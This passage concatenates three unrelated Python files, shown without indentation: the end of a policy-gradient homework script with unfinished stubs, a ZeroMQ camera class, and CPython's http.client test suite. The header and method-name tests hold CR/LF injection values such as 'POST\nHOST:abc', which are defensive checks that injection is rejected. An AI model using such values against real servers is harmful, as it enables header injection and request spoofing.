# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
raise NotImplementedError
b_n = None # YOUR CODE HERE
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
raise NotImplementedError
adv_n = None # YOUR_CODE_HERE
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
raise NotImplementedError
target_n = None
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
raise NotImplementedError
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
zmq_camera.py | import threading
import traitlets
import sys
import zmq
import numpy as np
import atexit
from .camera import Camera
def recv_image(socket, dtype, shape):
data = socket.recv()
buf = memoryview(data)
array = np.frombuffer(buf, dtype=dtype)
return array.reshape(shape)
class ZmqCamera(Camera):
value = traitlets.Any(value=np.zeros((224, 224, 3), dtype=np.uint8), default_value=np.zeros((224, 224, 3), dtype=np.uint8))
def __init__(self, *args, **kwargs):
# self.value = np.zeros((224, 224, 3), dtype=np.uint8) # set default image
self._running = False
self._port = 1807
self._image_shape = (224, 224, 3)
self._image_dtype = np.uint8
self.start()
atexit.register(self.stop)
def __del__(self):
self.stop()
def _run(self):
context = zmq.Context()
self.socket = context.socket(zmq.SUB)
self.socket.setsockopt(zmq.CONFLATE, 1) # last msg only.
self.socket.setsockopt(zmq.SUBSCRIBE, b'') # all topics
self.socket.connect("tcp://localhost:%d" % self._port)
while self._running:
image = recv_image(self.socket, self._image_dtype, self._image_shape)
self.value = image
self.socket.close()
def start(self):
if self._running:
return
self._running = True
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
if not self._running:
return
self._running = False
self._thread.join() |
test_httplib.py | import errno
from http import client
import io
import itertools
import os
import array
import socket
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\nContent-Length:')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile():
mode = 'r'
d = data()
def read(self, blocksize=-1):
return self.d.__next__()
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
